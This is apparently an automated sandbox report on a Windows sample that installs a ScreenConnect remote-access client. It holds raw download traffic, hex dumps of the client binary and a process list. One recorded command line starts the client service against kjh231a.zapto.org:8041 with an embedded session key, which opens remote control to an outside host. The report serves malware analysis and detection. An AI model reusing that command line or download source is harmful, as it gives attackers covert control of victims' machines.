                                                                                                                                                                                                                                                        2024-10-25 17:27:51 UTC102OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 600864
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:51 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 08 e6 df 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fa 08 00 00 06 00 00 00 00 00 00 8a 12 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 ca be 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 2c 00 00 11 73 af 07 00 06 0a 06 02 7d 15 03 00 04 28 74 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 75 01 00 0a 28 76 01 00 0a 16 8d 11 00 00 01 28 77 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 ce 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e aa 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 29 07 00 06 73 cf 01 00 0a 25 80 aa 02 00 04 28 33 00 00 2b 6f d0 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d1 01 00 0a 7d 17 03 00 04 11 04 7b 17 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 17 03 00 04 6f 18 03 00 06 28 39 06 00 06 13 06 11 04 7b 17 03 00 04 6f 2c 03 00 06 28 4d 06 00 06 13 07 11 04 7b 17 03 00 04 6f 2d 03 00 06 28 4d 06 00 06 13 08 11 04 7b 17 03 00 04 6f 18 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a 11 0e 13 09 11 05 7b 74 02 00 04 2d 21
                                                                                                                                                                                                                                                        Data Ascii: ,s}(t,rp(u(v(w}H((((~%-&~)s%(3+o8$o}{(,+{o(9{o,(M{o-(M{o(%o{t-!
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 04 6f 0e 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 16 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f bb 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 16 03 00 0a 74 9b 00 00 01 17 6f 17 03 00 0a 26 02 7b 54 00 00 04 14 6f 7a 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0e 07 00 06 8c b6 00 00 02 a2 28 09 03 00 0a 02 7b 54 00 00 04 6f 0e 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f bb 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0c 03 00 0a 6f 0e 02 00 0a 2b 10 02 7b 5a 00
                                                                                                                                                                                                                                                        Data Ascii: o.{To*0b{To,M{Z(o{To{T{Toto&{Toz(<*(<*0Grp%3%{To({To..'+5{Z(o-"(so+{Z
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 70 28 b0 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 62 00 00 11 73 3f 08 00 06 0a 06 02 7d 94 03 00 04 02 03 28 28 04 00 0a 06 02 28 29 04 00 0a 28 b1 00 00 2b 7d 93 03 00 04 02 28 29 04 00 0a 26 02 28 2a 04 00 0a 6f 2b 04 00 0a 02 28 2a 04 00 0a 02 7b 89 00 00 04 06 fe 06 40 08 00 06 73 2c 04 00 0a 28 b2 00 00 2b 06 fe 06 41 08 00 06 73 2d 04 00 0a 28 b3 00 00 2b 28 b4 00 00 2b 6f 2e 04 00 0a 2a c2 02 28 2f 04 00 0a 02 7e 30 04 00 0a 28 31 04 00 0a 02 20 02 60 00 00 17 28 32 04 00 0a 02 02 fe 06 e0 01 00 06 73 33 04 00 0a 28 34 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02
                                                                                                                                                                                                                                                        Data Ascii: p(+}*0pbs?}((()(+}()&(*o+(*{@s,(+As-(+(+o.*(/~0(1 `(2s3(4*{*"}*{*"}*{*"}*{*"}*
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 6f c7 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 ab 02 00 06 2c 07 02 28 ab 02 00 06 2a 02 28 94 02 00 06 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 a0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a7 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a7 02 00 06 2a 02 6f 1e 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 92 00 00 11 02 28 67 05 00 0a 2d 1d 02 28 9e 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 9e 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a5 02 00 06 12 00 fe 15 1d 00 00 01 06 28 68 05 00 0a 2c 07 02 28 a5 02 00 06 2a 02 6f 1d 04 00 0a 2a d6 02 28 67 05 00 0a 2d 0f 02 28 a2 02 00 06 2c 07 02 28 a2 02 00 06 2a 02 7b
                                                                                                                                                                                                                                                        Data Ascii: o*z{,(,(*(*0Q(g-((h,(*{,((h,(*o*0Q(g-((h,(*{,((h,(*o*(g-(,(*{
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 7c 03 00 06 02 73 0b 06 00 0a 7d 38 01 00 04 02 02 fe 06 87 03 00 06 73 82 01 00 0a 28 0c 06 00 0a 02 7b 38 01 00 04 02 fe 06 88 03 00 06 73 82 01 00 0a 6f 0d 06 00 0a 02 02 fe 06 89 03 00 06 73 9e 01 00 0a 28 9f 01 00 0a 02 02 fe 06 8a 03 00 06 73 82 01 00 0a 28 0e 06 00 0a 2a 32 02 7b 38 01 00 04 6f 0f 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 10 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c3 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 50 01 00 2b 0a 06 07 33
                                                                                                                                                                                                                                                        Data Ascii: }7*0d(|s}8s({8sos(s(*2{8o*6{8o*0){:(t|:(P+3*0){:(t|:(P+3
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b3 07 00 0a 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 b4 07 00 0a 1f 20 17 28 b5 07 00 0a 7d 3b 05 00 04 06 06 7b 39 05 00 04 6f b2 07 00 0a 0c 12 02 28 a1 04 00 0a 1f 20 73 b6 07 00 0a 7d 3d 05 00 04 06 14 7d 3c 05 00 04 02 06 7b 39 05 00 04 06 fe 06 82 0a 00 06 73 96 07 00 0a 28 9a 01 00 2b de 39 06 7b 3b 05 00 04 2c 0b 06 7b 3b 05 00 04 6f 22 00 00 0a dc 06 7b 3a 05 00 04 2c 0b 06 7b 3a 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 66 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 b0 01 00 06 02 20 16 22 00 00 17 28 32 04 00 0a 02
                                                                                                                                                                                                                                                        Data Ascii: 9o({9o( (};{9o( s}=}<{9s(+9{;,{;o"{:,{:o",o"(f&*4iA5$0J( "(2
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 38 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 38 05 00 06 80 0f 02 00 04 1f 21 1f 10 28 38 05 00 06 80 10 02 00 04 1f 20 1f 10 28 38 05 00 06 80 11 02 00 04 20 c8 00 00 00 28 37 05 00 06 80 12 02 00 04 d0 88 00 00 02 28 bf 00 00 0a 6f 96 08 00 0a 6f 97 08 00 0a 7e 83 05 00 04 fe 06 d9 0a 00 06 73 5f 01 00 0a 28 d2 01 00 2b 7e 83 05 00 04 fe 06 da 0a 00 06 73 5f 01 00 0a 28 21 00 00 2b 0c 28 98 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 44 05 00 06 28 c6 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 98 08 00 0a 02 6f 44 05 00 06 28 c6 04 00 06 7e aa 00 00 0a 02 6f b2 03 00 0a 6f 99 08 00 0a 2a 2e 28 c5 04 00 06 6f 61 05 00 06 2a 2e 28 c5 04 00 06 6f 47 05 00 06 2a 2e 28 c5 04 00 06 6f 4d 05
                                                                                                                                                                                                                                                        Data Ascii: (8(8!(8 (8 (7(oo~s_(+~s_(!+(%-&(oD(*~**(oD(~oo*.(oa*.(oG*.(oM
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 00 80 00 00 5f 16 fe 03 2a 3e 1f fe 73 0b 0c 00 06 25 02 7d 35 06 00 04 2a 00 00 00 13 30 03 00 59 00 00 00 3f 01 00 11 73 be 0b 00 06 0a 06 03 7d f9 05 00 04 06 7b f9 05 00 04 28 15 02 00 2b 2d 02 15 2a 02 28 10 06 00 06 06 fe 06 bf 0b 00 06 73 a4 09 00 0a 28 16 02 00 2b 7e d0 05 00 04 25 2d 17 26 7e cf 05 00 04 fe 06 8d 0b 00 06 73 76 05 00 0a 25 80 d0 05 00 04 16 28 22 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 40 01 00 11 73 a5 09 00 0a 0a 06 03 7d a6 09 00 0a 02 06 fe 06 a7 09 00 0a 73 a8 09 00 0a 15 28 17 02 00 2b 7e a9 09 00 0a 25 2d 17 26 7e aa 09 00 0a fe 06 ab 09 00 0a 73 ac 09 00 0a 25 80 a9 09 00 0a 28 18 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 41 01 00 11 7e ad 09 00 0a 72 16 40 00 70 02 8c 65 00 00 01 28 23 06 00 0a 6f ae 09 00 0a 0a
                                                                                                                                                                                                                                                        Data Ascii: _*>s%}5*0Y?s}{(+-*(s(+~%-&~sv%("+*0E@s}s(+~%-&~s%(+*0.A~r@pe(#o
                                                                                                                                                                                                                                                        2024-10-25 17:27:52 UTC16384INData Raw: 87 02 00 04 02 28 46 00 00 0a 2a 1e 02 7b 84 02 00 04 2a 1e 02 7b 85 02 00 04 2a 1e 02 7b 86 02 00 04 2a 1e 02 7b 87 02 00 04 2a 32 02 7b 82 02 00 04 6f 7e 06 00 0a 2a 36 02 7b 83 02 00 04 03 6f 18 0b 00 0a 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a e6 02 28 d7 00 00 0a 02 20 06 20 00 00 17 28 32 04 00 0a 02 16 28 a2 00 00 0a 02 17 6f fb 01 00 0a 02 17 28 19 0b 00 0a 02 28 1a 0b 00 0a 02 28 ba 01 00 0a 28 f8 01 00 0a 2a 76 02 28 29 08 00 0a 25 20 00 00 00 80 6f eb 04 00 0a 25 20 88 00 00 00 6f ec 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 90 01 00 11 0f 01 28 ef 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f2 01 00 0a 28 1b 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f2 01 00 0a 28 86 00 00 0a 73 41 05 00 0a 2a 02 02 28 f0 01 00 0a 02 28 ec 01 00 0a 02 28
                                                                                                                                                                                                                                                        Data Ascii: (F*{*{*{*{*2{o~*6{o*{*"}*( (2(o((((*v()% o% o*0(,+((((,((sA*(((


                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:13:27:17
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\96r3GgxntQ.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\96r3GgxntQ.exe"
                                                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                                                        File size:83'360 bytes
                                                                                                                                                                                                                                                        MD5 hash:1D59C17159AD086256E0C1C2C34666AE
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                        Start time:13:27:17
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                        Imagebase:0x27688430000
                                                                                                                                                                                                                                                        File size:24'856 bytes
                                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
                                                                                                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
                                                                                                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                        Start time:13:27:20
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                        Imagebase:0xa0000
                                                                                                                                                                                                                                                        File size:600'864 bytes
                                                                                                                                                                                                                                                        MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                                                                                                                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                        MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                                                                                                                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                        MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                        Start time:13:27:56
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
                                                                                                                                                                                                                                                        Imagebase:0xc70000
                                                                                                                                                                                                                                                        File size:600'864 bytes
                                                                                                                                                                                                                                                        MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
